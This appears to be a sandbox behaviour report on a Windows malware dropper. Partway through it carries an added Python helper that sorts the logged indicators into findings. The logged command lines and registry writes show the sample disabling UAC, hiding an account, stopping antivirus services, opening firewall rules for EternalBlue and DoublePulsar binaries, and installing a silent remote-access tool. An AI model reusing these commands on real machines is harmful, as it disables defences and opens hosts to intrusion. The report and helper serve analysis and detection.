| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlog.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\rfxvmt.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Windows\winit.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\MIME\Database | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\ProgramData\Windows\winit.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows\winit.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\P.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\R8.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\winlogon.exe | N/A |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| N/A | N/A | C:\Programdata\WindowsTask\winlogon.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
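The registry indicators in the tables above (EnableLUA and ConsentPromptBehaviorAdmin set to 0, the John account hidden under Winlogon\SpecialAccounts\UserList, AllowMultipleTSSessions enabled, the "Realtek HD Audio" Run key) and the sc / netsh / attrib / icacls command lines in the Processes list below are the parts of this report an analyst most needs in structured form. The helper below is an added example, not part of the report or of the sandbox's own tooling: it parses lines in exactly the shape this report prints them and groups them into findings. The sample lines it embeds are copied from this report; the category names (service_delete, firewall_allow_program, hidden_account and so on) are the example's own assumptions, not sandbox terminology.

```python
import re
from collections import defaultdict

# Constructed sample input: command lines from the Processes list and
# "Set value" registry indicators from the signature tables, copied from
# this report so the helper runs offline.
COMMAND_LINES = [
    r'C:\Windows\system32\cmd.exe /c sc stop mbamservice',
    r'sc delete mbamservice',
    r'C:\Windows\system32\cmd.exe /c sc delete "windows node"',
    r'sc config appidsvc start= auto',
    r'sc delete MoonTitle"',
    r'netsh advfirewall set allprofiles state on',
    r'netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN',
    r'netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes',
    r'netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN',
    r'ATTRIB +H +S C:\Programdata\Windows\*.*',
    r'C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)',
    r'rutserv.exe /silentinstall',
]
REGISTRY_EVENTS = [
    r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"',
    r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"',
    r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"',
    r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"',
    r'\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"',
]

# <key path>\<value name> = "<data>", as the report prints "Set value" rows.
REG_SET_RE = re.compile(r'^(?P<key>\\REGISTRY\\.+)\\(?P<name>[^\\]+) = "(?P<data>.*)"$')


def strip_cmd_wrapper(cmd):
    # Drop a leading 'cmd.exe /c ' so the wrapped command is classified, not cmd.exe.
    head, sep, tail = cmd.partition(' /c ')
    return tail if sep and head.lower().rstrip('"').endswith('cmd.exe') else cmd


def tokenize(cmd):
    # Split on whitespace outside double quotes. Quotes are toggled rather than
    # matched, so the unbalanced trailing quote in 'sc delete MoonTitle"' is harmless.
    tokens, cur, quoted = [], '', False
    for ch in cmd:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur.strip():
                tokens.append(cur.strip())
            cur = ''
        else:
            cur += ch
    if cur.strip():
        tokens.append(cur.strip())
    return tokens


def classify_command(cmd):
    # Map one command line to a (category, detail) pair; categories are this example's own.
    tok = tokenize(strip_cmd_wrapper(cmd))
    if not tok:
        return None
    exe = tok[0].lower().rsplit('\\', 1)[-1]
    if exe in ('sc', 'sc.exe') and len(tok) >= 3:          # sc stop|delete|config|start <svc>
        return ('service_' + tok[1].lower(), tok[2])
    if exe in ('netsh', 'netsh.exe'):
        sub = [t.lower() for t in tok[1:4]]
        if sub == ['advfirewall', 'firewall', 'add']:
            kv = {k.lower(): v for k, v in (t.split('=', 1) for t in tok[5:] if '=' in t)}
            action = kv.get('action', 'unknown').lower()
            if 'program' in kv:
                return ('firewall_%s_program' % action, kv['program'])
            if 'localport' in kv:
                return ('firewall_%s_port' % action, '%s/%s' % (kv.get('protocol', '?').upper(), kv['localport']))
        if sub[:2] == ['advfirewall', 'set']:
            return ('firewall_profile', ' '.join(tok[3:]))
    if exe in ('attrib', 'attrib.exe') and {'+H', '+S'} & {t.upper() for t in tok[1:]}:
        return ('hide_path', tok[-1])
    if exe in ('icacls', 'icacls.exe') and '/deny' in [t.lower() for t in tok]:
        return ('acl_deny', tok[1])
    return ('unclassified', exe)


def classify_registry(event):
    # Flag "Set value" rows that weaken UAC, hide an account, open RDP or add persistence.
    m = REG_SET_RE.match(event)
    if not m:
        return None
    key, name, data = m.group('key').lower(), m.group('name'), m.group('data')
    if key.endswith(r'\policies\system') and name == 'EnableLUA' and data == '0':
        return ('uac_disabled', name)
    if key.endswith(r'\policies\system') and name == 'ConsentPromptBehaviorAdmin' and data == '0':
        return ('uac_no_prompt', name)
    if key.endswith(r'\winlogon\specialaccounts\userlist') and data == '0':
        return ('hidden_account', name)                     # removed from the logon screen
    if key.endswith(r'\winlogon') and name == 'AllowMultipleTSSessions' and data == '1':
        return ('rdp_multi_session', name)
    if key.endswith(r'\currentversion\run'):
        return ('run_key', '%s -> %s' % (name, data))
    return None


def triage(commands, registry_events):
    # Group every finding by category, preserving the order in the report.
    findings = defaultdict(list)
    for hit in list(map(classify_command, commands)) + list(map(classify_registry, registry_events)):
        if hit:
            findings[hit[0]].append(hit[1])
    return dict(findings)
```

Running `triage(COMMAND_LINES, REGISTRY_EVENTS)` on the embedded sample yields one list per category: the services stopped and deleted (mbamservice, "windows node", MoonTitle), the inbound 445 block, the allow rule for `C:\ProgramData\rundll\Eternalblue-2.2.0.exe`, the hidden path and denied ACL, and the four registry findings. The parser deliberately reads the report's own text rather than a live host, so the same functions work on any report in this format; the `unclassified` bucket (here `rutserv.exe`) is kept on purpose so nothing silently drops out.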
Processes
C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe
"C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe"
C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
C:\programdata\install\ink.exe
C:\programdata\install\ink.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
C:\Windows\SysWOW64\sc.exe
sc delete swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
C:\Windows\SysWOW64\sc.exe
sc stop Adobeflashplayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
C:\Windows\SysWOW64\sc.exe
sc stop MoonTitle
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop AudioServer
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
C:\Windows\SysWOW64\sc.exe
sc stop AudioServer
C:\Windows\SysWOW64\sc.exe
sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MoonTitle
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AudioServer"
C:\Windows\SysWOW64\sc.exe
sc delete AudioServer"
C:\Windows\SysWOW64\sc.exe
sc delete MoonTitle"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
C:\Windows\SysWOW64\sc.exe
sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30318_64"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\netsh.exe
